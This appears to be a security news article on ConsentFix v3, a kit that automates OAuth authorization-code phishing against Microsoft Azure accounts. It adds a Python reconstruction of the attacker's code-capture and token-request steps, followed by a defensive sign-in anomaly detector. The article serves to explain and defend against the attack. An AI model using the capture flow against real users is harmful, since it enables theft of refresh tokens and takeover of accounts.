ConsentFix v3 Automates OAuth Attacks Against Microsoft Azure

A new attack kit called ConsentFix v3 has surfaced on hacker forums. It automates OAuth abuse against Microsoft Azure environments and is built to run at scale. An operation starts by confirming that the target organization has a Microsoft tenant and gathering employee details, then creating throwaway accounts on services including Outlook, Cloudflare, and Pipedream to host the phishing and exfiltration infrastructure. Pipedream plays three roles: the webhook endpoint that receives authorization codes, the automation that exchanges each code for a refresh token, and the central store where collected tokens are kept.

Attackers deploy phishing pages on Cloudflare Pages that mimic legitimate Microsoft interfaces. Rather than faking a login form, the page starts a genuine OAuth authorization request against Microsoft's login endpoints, so the victim signs in on the real Microsoft page. The abused application's registered redirect URI is http://localhost, so after sign-in the browser is sent to a localhost URL carrying the authorization code; nothing is listening there, the page fails to load, and the phishing page coaches the victim into pasting or dragging that URL back into it. Because the attacker's page initiated the request, it also holds the state value and any PKCE verifier, so those protections do not block the exchange. Pipedream then redeems the code for tokens automatically, and the tokens are imported into Specter Portal, giving the attacker access to the victim's email, files, and other resources with the victim's own permissions.
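The hand-off described above, reconstructed as an added example (this is not code from the ConsentFix kit or from Push Security). It builds the kind of authorization URL the phishing page would open, pulls the code out of the localhost URL a victim would paste back, and assembles the token request the automation would send. No network calls are made. The client ID, the localhost port, and the pasted URL in the test are placeholders and constructed data, not values from the article; the point is to show that state and PKCE belong to whoever starts the flow, and that the only secret the victim hands over is the code itself.

```python
"""Data flow of an OAuth code hand-off where the attacker initiates the flow.

Added illustration; not the original kit's code. CLIENT_ID, REDIRECT_URI and the
sample URL are assumptions, not values reported in the article.
"""
import base64
import hashlib
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

# Real Microsoft identity platform endpoints (v2.0, multi-tenant "common" authority).
AUTHORIZE_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/token"

# ASSUMPTION: placeholder for a public client that has http://localhost registered
# as a redirect URI, and an arbitrary port. Neither comes from the article.
CLIENT_ID = "00000000-0000-0000-0000-000000000000"
REDIRECT_URI = "http://localhost:8400/"
# offline_access is what makes the exchange return a refresh token, not just an access token.
SCOPE = "openid profile offline_access https://graph.microsoft.com/.default"


def _b64url(raw: bytes) -> str:
    """Base64url without padding, as PKCE (RFC 7636) requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def start_flow() -> dict:
    """Phishing-page side: build a genuine authorization URL.

    Because this side initiates the request it also mints the state value and the
    PKCE verifier, which is why neither of those checks protects the victim here.
    """
    code_verifier = _b64url(secrets.token_bytes(32))
    code_challenge = _b64url(hashlib.sha256(code_verifier.encode()).digest())
    state = secrets.token_urlsafe(16)
    params = {
        "client_id": CLIENT_ID,
        "response_type": "code",
        "redirect_uri": REDIRECT_URI,
        "response_mode": "query",
        "scope": SCOPE,
        "state": state,
        "code_challenge": code_challenge,
        "code_challenge_method": "S256",
    }
    return {
        "url": f"{AUTHORIZE_URL}?{urlencode(params)}",
        "state": state,
        "code_verifier": code_verifier,
    }


def verify_pkce_pair(authorize_url: str, code_verifier: str) -> bool:
    """Check that the challenge embedded in the URL was derived from this verifier."""
    query = parse_qs(urlsplit(authorize_url).query)
    expected = _b64url(hashlib.sha256(code_verifier.encode()).digest())
    return query.get("code_challenge", [None])[0] == expected


def extract_code(pasted_url: str, expected_state: str) -> str:
    """Backend side: pull the authorization code out of the URL the victim pasted.

    Nothing listens on localhost on the victim's machine, so the browser shows an
    error page and the address bar is the only place the code exists.
    """
    parts = urlsplit(pasted_url.strip())
    if parts.scheme != "http" or parts.hostname != "localhost":
        raise ValueError("not a localhost redirect")
    query = parse_qs(parts.query)
    if "error" in query:
        raise ValueError(f"authorization failed: {query['error'][0]}")
    if query.get("state", [None])[0] != expected_state:
        raise ValueError("state does not match the flow we started")
    return query["code"][0]


def build_token_request(code: str, code_verifier: str) -> dict:
    """The form body that would be POSTed to TOKEN_URL. Built only, never sent here."""
    return {
        "client_id": CLIENT_ID,
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": REDIRECT_URI,
        "code_verifier": code_verifier,
        "scope": SCOPE,
    }
```

The redirect_uri in the token request must match the one in the authorization request byte for byte, which is why a public client with http://localhost registered is the enabler: that value is attacker-reachable without owning any domain at all.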

Push Security researchers note that mitigation is complicated because first-party Microsoft apps are trusted by design in every tenant, so the abused application cannot simply be treated as a rogue third-party registration and denied consent. Administrators can bind tokens to trusted devices so a token redeemed on an attacker's host is rejected, build behavioral detections around sign-in and token activity, and restrict which applications users are allowed to authenticate to. Earlier versions of ConsentFix still depended on the attacker handling each pasted or dragged authorization code by hand; v3 automates the exchange and collection end to end. It remains unclear whether ConsentFix v3 has gained significant traction in real campaigns. The researchers tested mainly with personal Microsoft accounts, so its full impact in enterprise tenants, where permissions and tenant settings vary, has not been assessed.
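One shape a behavioral detection can take, as an added example rather than anything Push Security published: the victim's interactive sign-in happens in their own browser, from their own IP, but the refresh token is then redeemed from the attacker's infrastructure. Grouping sign-in events by user and application and flagging non-interactive token activity that follows an interactive sign-in within a short window from a different IP surfaces that split. The records below are constructed and simplified; the field names only loosely follow Entra sign-in logs and would need mapping to real exports.

```python
"""Flag token activity whose source IP differs from the interactive sign-in it follows.

Added example; the events are constructed sample data, not real log lines.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. 198.51.100.0/24 stands in for the corporate egress,
# 203.0.113.77 for an attacker-controlled host. "appId" is the abused application.
EVENTS = [
    {"time": "2025-01-10T09:00:00", "user": "alice@contoso.example", "appId": "app-1",
     "ip": "198.51.100.10", "interactive": True},   # victim signs in on the real Microsoft page
    {"time": "2025-01-10T09:00:40", "user": "alice@contoso.example", "appId": "app-1",
     "ip": "203.0.113.77", "interactive": False},   # token redeemed 40 s later from elsewhere
    {"time": "2025-01-10T09:05:00", "user": "alice@contoso.example", "appId": "app-1",
     "ip": "203.0.113.77", "interactive": False},   # refresh token used again
    {"time": "2025-01-10T10:00:00", "user": "bob@contoso.example", "appId": "app-1",
     "ip": "198.51.100.11", "interactive": True},   # benign: same IP throughout
    {"time": "2025-01-10T10:01:00", "user": "bob@contoso.example", "appId": "app-1",
     "ip": "198.51.100.11", "interactive": False},
]


def find_split_redemptions(events, window_minutes=10):
    """Return alerts for non-interactive events within `window_minutes` of the most
    recent interactive sign-in for the same user and app, where the IP differs."""
    window = timedelta(minutes=window_minutes)
    by_key = defaultdict(list)
    for event in events:
        by_key[(event["user"], event["appId"])].append(event)

    alerts = []
    for (user, app_id), evs in by_key.items():
        evs.sort(key=lambda e: e["time"])
        last_interactive = None  # (timestamp, ip) of the latest interactive sign-in
        for event in evs:
            stamp = datetime.fromisoformat(event["time"])
            if event["interactive"]:
                last_interactive = (stamp, event["ip"])
                continue
            if last_interactive is None:
                continue
            seen_at, seen_ip = last_interactive
            if stamp - seen_at <= window and event["ip"] != seen_ip:
                alerts.append({
                    "user": user,
                    "appId": app_id,
                    "signin_ip": seen_ip,
                    "token_ip": event["ip"],
                    "time": event["time"],
                })
    return alerts


if __name__ == "__main__":
    for alert in find_split_redemptions(EVENTS):
        print(alert)
```

Expect false positives from VPN hand-offs and mobile carriers that change egress between the sign-in and the first token use; in practice the IP comparison is usually relaxed to ASN or country, and the window and the list of watched application IDs are tuned per tenant.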
